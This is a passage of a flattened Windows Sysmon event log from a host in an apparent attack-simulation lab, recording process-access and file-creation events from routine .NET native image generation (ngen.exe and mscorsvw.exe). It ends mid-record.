13:44:59.533{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90DB-6005-5D01-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:59.533{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90DB-6005-5D01-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:59.533{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90DB-6005-5D01-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:59.439{59A5CD1D-90DA-6005-5C01-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c10-0\System.Xaml.dll2021-01-18 13:44:59.439 10341000x80000000000000005582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:02.954{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90DE-6005-6001-00000000A301}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:02.939{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90DE-6005-6001-00000000A301}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:02.939{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90DE-6005-6001-00000000A301}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:02.861{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90DE-6005-5F01-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:02.845{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90DE-6005-5F01-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:02.845{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90DE-6005-5F01-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:02.673{59A5CD1D-90DB-6005-5E01-00000000A301}2240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\8c0-0\WindowsBase.dll2021-01-18 13:45:02.673 10341000x80000000000000005594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:03.970{59A5CD1D-8E46-6005-1400-00000000A301}13041440C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:03.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90DF-6005-6301-00000000A301}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:03.861{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90DF-6005-6301-00000000A301}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:03.861{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90DF-6005-6301-00000000A301}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:03.814{59A5CD1D-90DF-6005-6201-00000000A301}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\8b8-0\System.Xml.Linq.dll2021-01-18 13:45:03.814 10341000x80000000000000005589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:03.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90DF-6005-6201-00000000A301}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:03.486{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90DF-6005-6201-00000000A301}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:03.486{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90DF-6005-6201-00000000A301}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:03.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90DF-6005-6101-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:03.392{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90DF-6005-6101-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:03.392{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90DF-6005-6101-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:03.329{59A5CD1D-90DE-6005-6001-00000000A301}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\ca0-0\System.Net.Http.dll2021-01-18 13:45:03.329 10341000x80000000000000005604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:04.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90E0-6005-6601-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:04.923{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90E0-6005-6601-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:04.923{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90E0-6005-6601-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:04.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90E0-6005-6501-00000000A301}1408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:04.876{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90E0-6005-6501-00000000A301}1408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 